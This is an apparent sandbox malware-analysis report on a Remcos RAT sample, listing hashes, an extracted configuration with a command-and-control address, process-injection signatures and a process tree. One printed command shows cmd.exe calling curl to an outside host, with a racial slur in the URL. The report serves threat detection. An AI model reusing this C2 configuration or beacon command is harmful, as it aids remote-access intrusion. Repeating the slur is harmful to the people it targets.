Analysis
-
max time kernel
117s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
22-04-2024 11:56
Static task
static1
Behavioral task
behavioral1
Sample
av_sec.exe
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
av_sec.exe
Resource
win10v2004-20240412-en
General
-
Target
av_sec.exe
-
Size
11.2MB
-
MD5
ab2c5633a45550670bca99f5cb82310c
-
SHA1
1b41983e38999ab3dcbad4a74cf2c7bf6ef9711e
-
SHA256
3bcf561a6a414a306a3196ca7174fd99b966faacb8f0ce4fae4bc72d32a4aebf
-
SHA512
80c7f67c87aebabbaef79828d5f269229d6218ba12abb8473e71c95d9fe9e967ca288c1dcb97d2d97f67946b9350923318e298c2d7a276b25877b2c092bc7ec9
-
SSDEEP
196608:cz97cMnvqx44EpYRPY4jTrcWrYdTjBI/TY0rA1q:k9wIvqx4xYRPYirxkZ6/j
Malware Config
Extracted
remcos
RemoteHost
178.33.57.155:443
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-PM1AI7
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
RttHlp.exeRttHlp.exepid process 2204 RttHlp.exe 2604 RttHlp.exe -
Loads dropped DLL 6 IoCs
Processes:
RttHlp.exeRttHlp.exepid process 2204 RttHlp.exe 2204 RttHlp.exe 2204 RttHlp.exe 2204 RttHlp.exe 2604 RttHlp.exe 2604 RttHlp.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
RttHlp.exedescription pid process target process PID 2604 set thread context of 2876 2604 RttHlp.exe cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
av_sec.exeRttHlp.exeRttHlp.execmd.exepid process 2824 av_sec.exe 2824 av_sec.exe 2204 RttHlp.exe 2604 RttHlp.exe 2604 RttHlp.exe 2876 cmd.exe 2876 cmd.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
RttHlp.execmd.exepid process 2604 RttHlp.exe 2876 cmd.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
av_sec.exepid process 2824 av_sec.exe -
Suspicious use of WriteProcessMemory 31 IoCs
Processes:
av_sec.exeRttHlp.exeRttHlp.execmd.exeexplorer.exeWScript.exedescription pid process target process PID 2824 wrote to memory of 2204 2824 av_sec.exe RttHlp.exe PID 2824 wrote to memory of 2204 2824 av_sec.exe RttHlp.exe PID 2824 wrote to memory of 2204 2824 av_sec.exe RttHlp.exe PID 2824 wrote to memory of 2204 2824 av_sec.exe RttHlp.exe PID 2204 wrote to memory of 2604 2204 RttHlp.exe RttHlp.exe PID 2204 wrote to memory of 2604 2204 RttHlp.exe RttHlp.exe PID 2204 wrote to memory of 2604 2204 RttHlp.exe RttHlp.exe PID 2204 wrote to memory of 2604 2204 RttHlp.exe RttHlp.exe PID 2604 wrote to memory of 2876 2604 RttHlp.exe cmd.exe PID 2604 wrote to memory of 2876 2604 RttHlp.exe cmd.exe PID 2604 wrote to memory of 2876 2604 RttHlp.exe cmd.exe PID 2604 wrote to memory of 2876 2604 RttHlp.exe cmd.exe PID 2604 wrote to memory of 2876 2604 RttHlp.exe cmd.exe PID 2876 wrote to memory of 2020 2876 cmd.exe explorer.exe PID 2876 wrote to memory of 2020 2876 cmd.exe explorer.exe PID 2876 wrote to memory of 2020 2876 cmd.exe explorer.exe PID 2876 wrote to memory of 2020 2876 cmd.exe explorer.exe PID 2876 wrote to memory of 2020 2876 cmd.exe explorer.exe PID 2020 wrote to memory of 2384 2020 explorer.exe WScript.exe PID 2020 wrote to memory of 2384 2020 explorer.exe WScript.exe PID 2020 wrote to memory of 2384 2020 explorer.exe WScript.exe PID 2020 wrote to memory of 2384 2020 explorer.exe WScript.exe PID 2384 wrote to memory of 2812 2384 WScript.exe cmd.exe PID 2384 wrote to memory of 2812 2384 WScript.exe cmd.exe PID 2384 wrote to memory of 2812 2384 WScript.exe cmd.exe PID 2384 wrote to memory of 2812 2384 WScript.exe cmd.exe PID 2876 wrote to memory of 2020 2876 cmd.exe explorer.exe PID 2020 wrote to memory of 1688 2020 explorer.exe WScript.exe PID 2020 wrote to memory of 1688 2020 explorer.exe WScript.exe PID 2020 wrote to memory of 1688 2020 explorer.exe WScript.exe PID 2020 wrote to memory of 1688 2020 explorer.exe WScript.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\av_sec.exe"C:\Users\Admin\AppData\Local\Temp\av_sec.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Users\Admin\AppData\Local\Temp\Beaconserver4\RttHlp.exeC:\Users\Admin\AppData\Local\Temp\Beaconserver4\RttHlp.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Users\Admin\AppData\Roaming\Beaconserver4\RttHlp.exeC:\Users\Admin\AppData\Roaming\Beaconserver4\RttHlp.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe5⤵
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\check1.vbs"6⤵
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl http://94.156.66.107:9000/hooks/nigger?id=GHPZRGFC7⤵PID:2812
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\kcdwmvakozwgwvpbpmnwpycjxlsie.vbs"6⤵PID:1688
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.5MB
MD5320634072eddd5b14ddddcf0e32d6608
SHA1d8db9bf00db95b25d2cd8b2c5888d250b535232b
SHA256bba6f76185241df9bf477ca6c815fb4914d000489ce84f54ed17eeda199a1714
SHA5128ea9e10a14de6f84041af79548a07936e84ececfdcab9c248aaab4bb80f1e387a6c421afb35e93c619698d6c93b5ebdace3b2f858910a74076c827d5e24971ff
-
Filesize
1.2MB
MD57fc367e04dbafab25f83e2e9cefb06cc
SHA1cb64b8ffcad54cee2081d61f5a8974b0e608a301
SHA256fc03c90357f6f25a492f4dd2871dc087e220494aa80c5d2ab2217843f91c988b
SHA512e41d9be708c9950bb33e16213a6d40f485b328438f5b66ac001b7705aaa8be0a698f9b62cd6b552e0e53b38db5c4f501d3da1c27660261e9594917d39ecba906
-
Filesize
1.0MB
MD540b9628354ef4e6ef3c87934575545f4
SHA18fb5da182dea64c842953bf72fc573a74adaa155
SHA256372b14fce2eb35b264f6d4aeef7987da56d951d3a09ef866cf55ed72763caa12
SHA51202b0ea82efbfbe2e7308f86bfbec7a5109f3fe91d42731812d2e46aebedce50aabc565d2da9d3fbcd0f46febbff49c534419d1a91e0c14d5a80f06b74888c641
-
Filesize
135KB
MD5a2d70fbab5181a509369d96b682fc641
SHA122afcdc180400c4d2b9e5a6db2b8a26bff54dd38
SHA2568aed681ad8d660257c10d2f0e85ae673184055a341901643f27afc38e5ef8473
SHA512219c6e7e88004fad9f4392be9a852c58fc43b7f6900e40370991427f37eaea5c18f48d2954f9479dde8bcb787345f4e292d5620add8224aec4d93d7968820b83
-
Filesize
11KB
MD56e4ffb2517b3570bf0c6766b8a0253fa
SHA12143b82dd1c8c3f4d0e0b146e65667a4e8552a9e
SHA256d690d10eac73dada021f73aa41e2e5f5f41d043ec3372512e138dc2f77623f41
SHA512d15317ea42fcb44a247f6300e33f14079e166b8a5bce285099b0ee21c68ce6ed753fcb8279956d27c94deabd28586fc142b1d4b3c852e0b181691dc55c58aa6f
-
Filesize
1.0MB
MD54b12739a07c02ef25a45d80516a87100
SHA1d976238dd9a697b7c35f85d3157282dfb68f4522
SHA256f003145b18b53ca237f3a0c1e7a21481c335467fe265474555dbc8e576d95fb6
SHA512f91ee89bd928d6880e4c58ffdfea47cd54e3ef38b50181e3717b7cc67ca0e03d764478a34ffccb7d2ddf72f85a1d2940729c79c8d727c960db615921974b7265
-
Filesize
1.9MB
MD595ecaf8770cb3d948f45588fc04e0dfd
SHA149890478b975dcbb7bac20e330d9498312583f85
SHA2565708ca3e0c822212494d2c4d51b2391904120cc5366adbc46e90fa9183d6b285
SHA51255fa8098cbbc1503e2603f7dee57173ce429f6f5da8a00b37c79744f6063d2c46918e993712f24a42857b6ff87092fa1b4dc7c8f40483930b596824a6ffcb2bc
-
Filesize
146B
MD585a2ebad40c21ba1da77230265b5351f
SHA1803822e08837ebda5de7dde963e4872ae2fc4c21
SHA256b5c409cbb25690b000d9d36c3b5170c1e61fff3d89bdaeadf0166ae28b0fdff9
SHA51277374eb3d9632c45c25c997380eab1ee338fbe659a24679b3cf28e76d67ffa71e2d2ea326181909d06970dca0e92b5528c1e7f9c866493162fd77170f87ea83a
-
Filesize
260B
MD520194639a471c85332924601e071aec4
SHA16a69ca7f78b34ca6a3959236237ef62de1cf09a2
SHA25643dddf81fa819e8499eb4a24211a2702ee8a3fc04048d4a8e3b3f4f9420c68e8
SHA5125616837814bf251f1d007cbaf8002aa66b91b199833437ca236507adaa40ece785264da6857445ab8ae958803453af67f631a0ec0cd1c931c7f3e763c24bc079
-
Filesize
1.1MB
MD5adf82ed333fb5567f8097c7235b0e17f
SHA1e6ccaf016fc45edcdadeb40da64c207ddb33859f
SHA256d6dd7a4f46f2cfde9c4eb9463b79d5ff90fc690da14672ba1da39708ee1b9b50
SHA5122253c7b51317a3b5734025b6c7639105dbc81c340703718d679a00c13d40dd74ccaba1f6d04b21ee440f19e82ba680aa4b2a6a75c618aed91bd85a132be9fc92